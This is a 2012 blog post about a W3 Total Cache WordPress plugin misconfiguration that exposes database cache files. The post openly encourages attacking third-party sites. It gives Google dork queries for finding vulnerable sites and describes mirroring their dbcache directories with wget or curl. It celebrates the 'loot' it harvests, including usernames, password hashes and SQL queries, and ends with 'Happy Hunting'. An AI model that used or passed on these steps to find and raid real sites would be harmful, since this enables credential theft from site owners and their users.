Saturday, 29 December 2012

The new Wordpress Vuln and How to find its victims

A sample of the loot from the W3 Total Cache vuln
So an interesting little misconfiguration has reared its ugly head in some WordPress sites.The vulnerability effects all WordPress sites that make use of a plugin called "W3 Total Cache"---you can get it here---. 

In this post I'm going to discuss exactly what the vulnerability is and why its bad news and then I'll quickly discuss how to find some loot and show you some of the awesome loot you can dig out with something like this. Enjoy!




What is W3 Total Cache?

W3 Total Cache improves the user experience of your site by improving your server performance, caching every aspect of your site, reducing the download times and providing transparent content delivery network (CDN) integration ---http://wordpress.org/extend/plugins/w3-total-cache/
and what's gone wrong its behaviour? Well it turns out if you're going to cache EVERYTHING including things like
  • SQL queries and the results they return 
  • Cookie Values
  • User Passwords and Usernames
  • etc
Basically the transactions users have with your WordPress site, you need to make sure malicious users can't access these records!

W3 Total Cache allows attackers to download the database cache files, the report on 1337day.com also claims that:
Even with directory listings off, cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable. Again, it seems odd that "deny from all" isn`t added to the .htaccess file.  Maybe it`s documented somewhere that you should secure your directories, or maybe it isn't; I'm not sure. --- http://1337day.com/exploit/20048
Okay so you guys have the details lets look at how you hunting for these poor sites.



 Finding Vulnerable Servers

As most of you guessed I'm gonna be sharing a dork or rather a couple of dorks that will list the directories with downloadable dbcache files:
  1. inurl:w3tc/dbcache/0..9 +inurl:wp-content
  2. inurl:w3tc +inurl:/dbcache/ +inurl:0..9 +inurl:wp-content
  3. inurl:w3tc +inurl:/dbcache/ +inurl:0..9 +inurl:wp-content
You can generate more by fiddling with the terms, breaking them up and maybe using verbatim searching but you should get quite an exhaustive list using these.


Examining the Loot

After running the dorks, you should stumble into directories that look like this:


These are the directories you're looking for

You can then navigate down the directories or download them using something like wget---site mirror option---or curl if you want, also the 1337day report includes a little tool that downloads all the dbcache files

Opening one of the files you should see something like this:
Looking at one of the dbcache files, its really just a serialized PHP object
To me this looks like a serialized PHP object. You can see some really interesting things logged here, stuff like SELECT queries and you can often drop some passwords and usernames, like this:
I've removed some details, but you can clearly see the hash here
Anyway I thought this was worth a mention since there's still quite a bit of loot left on the net.

Thanks for reading
and Happy Hunting ;)